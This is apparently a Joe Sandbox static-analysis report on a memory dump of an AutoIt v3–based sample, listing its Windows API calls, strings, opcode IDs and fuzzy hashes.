                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2117695475-0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002D8E
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002D9C
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002DAC
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002DBC
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002DCA
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002DD8
                                                                                                                      • Part of subcall function 00007FF655FFEEC8: RegisterWindowMessageW.USER32 ref: 00007FF655FFEF76
                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF655FE106D), ref: 00007FF655FE8209
                                                                                                                    • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF655FE106D), ref: 00007FF655FE828F
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF655FE106D), ref: 00007FF65602D36A
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID: AutoIt
                                                                                                                    • API String ID: 1986988660-2515660138
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3135491444-1585850449
                                                                                                                    APIs
                                                                                                                    • GetOpenFileNameW.COMDLG32 ref: 00007FF65602BAA2
                                                                                                                      • Part of subcall function 00007FF655FE56D4: GetFullPathNameW.KERNEL32(?,00007FF655FE56C1,?,00007FF655FE7A0C,?,?,?,00007FF655FE109E), ref: 00007FF655FE56FF
                                                                                                                      • Part of subcall function 00007FF655FE3EB4: GetLongPathNameW.KERNELBASE ref: 00007FF655FE3ED8
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                    • API String ID: 779396738-2360590182
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3812282468-0
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF655FE6F52,?,?,?,?,?,?,00007FF655FE782C), ref: 00007FF655FE6FA5
                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF655FE6F52,?,?,?,?,?,?,00007FF655FE782C), ref: 00007FF655FE6FD3
                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF655FE6F52,?,?,?,?,?,?,00007FF655FE782C), ref: 00007FF655FE6FFA
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2632591731-0
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF65601A2E2), ref: 00007FF656023EB0
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF65601A2E2), ref: 00007FF656023F15
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentStrings$Free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3328510275-0
                                                                                                                    APIs
                                                                                                                    • IsThemeActive.UXTHEME ref: 00007FF655FE3756
                                                                                                                      • Part of subcall function 00007FF656009334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF656009348
                                                                                                                      • Part of subcall function 00007FF655FE36E8: SystemParametersInfoW.USER32 ref: 00007FF655FE3705
                                                                                                                      • Part of subcall function 00007FF655FE36E8: SystemParametersInfoW.USER32 ref: 00007FF655FE3725
                                                                                                                      • Part of subcall function 00007FF655FE37B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE37F2
                                                                                                                      • Part of subcall function 00007FF655FE37B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3807
                                                                                                                      • Part of subcall function 00007FF655FE37B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE388D
                                                                                                                      • Part of subcall function 00007FF655FE37B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3924
                                                                                                                    • SystemParametersInfoW.USER32 ref: 00007FF655FE3797
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4207566314-0
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 485612231-0
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 918212764-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3947729631-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF656014970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF656014999
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF65602C8FE), ref: 00007FF655FE656F
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3938577545-0
                                                                                                                    APIs
                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF656004C5C
                                                                                                                      • Part of subcall function 00007FF656005600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF656005609
                                                                                                                      • Part of subcall function 00007FF656005600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF65600561A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1680350287-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 82841172-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Open_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3030063568-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572287377-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572287377-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentVersionWow64_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2932345936-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4292702814-0
                                                                                                                    • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                                    • Instruction ID: fe4ce7fa87c288104028afd458285f160b4f6a991940091b1d7534d77564e9cb
                                                                                                                    • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                                    • Instruction Fuzzy Hash: A5F0F851B0D24785FF659BA25E1127951915F88BB8F8C5630D82EEA2C2EE7EE488C610
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                    • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                    • Instruction ID: ee58a7d2943d06396554588cb10ffd508f306ee5fa261ec1d29d75882f40779c
                                                                                                                    • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                    • Instruction Fuzzy Hash: 8A22C336A087828BE710CF26E95456D77A1FB88B98F584235DE4E97B64CF3DD449CB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                    • API String ID: 1993697042-4164748364
                                                                                                                    • Opcode ID: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                                                    • Instruction ID: 119416cabf14809e3ef33f04967f0254fe99d7f862a5e56f46a3cb5d08c420b3
                                                                                                                    • Opcode Fuzzy Hash: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                                                    • Instruction Fuzzy Hash: EC52A832B18A4681EB648F25D5546BD3762FF85B88F584136DB0E93BA4CF3EE458C740
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                    • API String ID: 1218376639-328681919
                                                                                                                    • Opcode ID: 8c1f687f88e9da4140e4452ba941a0bd8309265392956f150e7897e172de2189
                                                                                                                    • Instruction ID: d8a527d0af9bce63440751f7329a03f76cf371346867543aa4478fb7dced9c47
                                                                                                                    • Opcode Fuzzy Hash: 8c1f687f88e9da4140e4452ba941a0bd8309265392956f150e7897e172de2189
                                                                                                                    • Instruction Fuzzy Hash: ED121632A0965286FB60DF25D6946BD23A1EF85BA4F484131DE1DA7BE5CF3ED40AC700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1208186926-3110715001
                                                                                                                    • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                    • Instruction ID: 02a690fd674f2f18476703e6abe7571dff4b24b451a50f711b3c87109fe14300
                                                                                                                    • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                    • Instruction Fuzzy Hash: C5123872A0864286E724CB25D6547BD37A1FB85798F080635DE4DA7BE0CF3EE849DB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-2439800395
                                                                                                                    • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                    • Instruction ID: 2ab769012b3e809691cf4373e236ff64a3e1200883bfe59b61f82156c463be3a
                                                                                                                    • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                    • Instruction Fuzzy Hash: 7BE1B27660878287E754CF26E94466A77A1FB88B88F540135DF4EA3B64CF7DE449CB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 3778422247-2988720461
                                                                                                                    • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                    • Instruction ID: 4c6478c6a4eeb675d6dd9dd68c1028fa2e45eb206765ab9a9dff2038d9205db3
                                                                                                                    • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                    • Instruction Fuzzy Hash: A7416621F0851287F7255B27EA1463A23A2BF88B99F594035CD0AE7B54DE7F984EC740
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3372153169-0
                                                                                                                    • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                    • Instruction ID: f22a70ee08dc9b1fa261d6f669bf66fceeafb70be35dd3388b5077cda45d7b0a
                                                                                                                    • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                    • Instruction Fuzzy Hash: 6922B335A0964385EBA48F26D9546BE3361FF44F98F9C4132CA5EA7694DF3EE848C700
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880407647-0
                                                                                                                    • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                                                    • Instruction ID: 0b2b9f972f81a66fb3469bba52443c187d1adc60702ffefda6940b5f5183645d
                                                                                                                    • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                                                    • Instruction Fuzzy Hash: F803C872A081C28BD7758E15DA40BF937A5FB9478CF480135DB4AB7B58DF39AA48CB40
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1015379403-0
                                                                                                                    • Opcode ID: c223660f41613faab48e644fda56d4534d60a7471830602c41769a8e954ea874
                                                                                                                    • Instruction ID: ef2401bb67939c6f15317984189c45a6597e46f4db9e94520baaa8a3ce61296b
                                                                                                                    • Opcode Fuzzy Hash: c223660f41613faab48e644fda56d4534d60a7471830602c41769a8e954ea874
                                                                                                                    • Instruction Fuzzy Hash: 5802E631A0868285EB60DF21D6442BD2771FF847A8F484632DA5EA7BE5DF3EE549C700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215588206-0
                                                                                                                    • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                    • Instruction ID: d9afe48b14e7166bb31880dab2ace07f4e456bcf41c0f3dccdc0fd65e88fcae9
                                                                                                                    • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                    • Instruction Fuzzy Hash: C5512232F0CB028AEB589F65E55917D33A2EB49748F184439DA0ED3784EE7ED45AC344
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 281475176-2761157908
                                                                                                                    • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                                                    • Instruction ID: 00486992325e1bfc689c41dbcecae92fb58ae852b9ce6eeaee7abaa4d0eebc9a
                                                                                                                    • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                                                    • Instruction Fuzzy Hash: 20B2F872A181828BE7658F65DA406FD37A2FF4438CF585135DA09B7B84DF3AE948CB04
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 0-3110715001
                                                                                                                    • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                                    • Instruction ID: f29a033eb3fad0c7b485dd48b15b6acc2241a072fda4c572bbee8e842fa24352
                                                                                                                    • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                                    • Instruction Fuzzy Hash: C3A1F932A0864286F764CF25D9142BE77A1FF84B98F588135DB4EA3A94CF7DE549CB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                    • String ID: -$:$:$?
                                                                                                                    • API String ID: 3440502458-92861585
                                                                                                                    • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                                    • Instruction ID: 8fbce857a9efef7b2eb65463e3a49fccf766648619c65bdeee4f5b54e3eca09a
                                                                                                                    • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                                    • Instruction Fuzzy Hash: 3FE1D332A0829286F7249F71DE506B96791FF84788F4C5135EA4EA2B99DF3ED449C700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                    • API String ID: 3232708057-3289030164
                                                                                                                    • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                    • Instruction ID: 08f2760ef434810ea32de7f9490b4d0702f304d066ec4c134c716649239c013e
                                                                                                                    • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                    • Instruction Fuzzy Hash: 3ED1E632B1865381EB50EF65E4550FE6721FB80B98F844132EE4DA7AA9DF7DD908CB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                    • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                                    • Instruction ID: fa18cad2e878119e1d950d0cf4d21c4bc7234d57e03faceb550f901d1e5c863d
                                                                                                                    • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                                    • Instruction Fuzzy Hash: 5D41E721A0865254EB40DB26EB442B96391FF84BA8F9C9131DD6DE36E4DF7ED44EC700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 890592661-1007645807
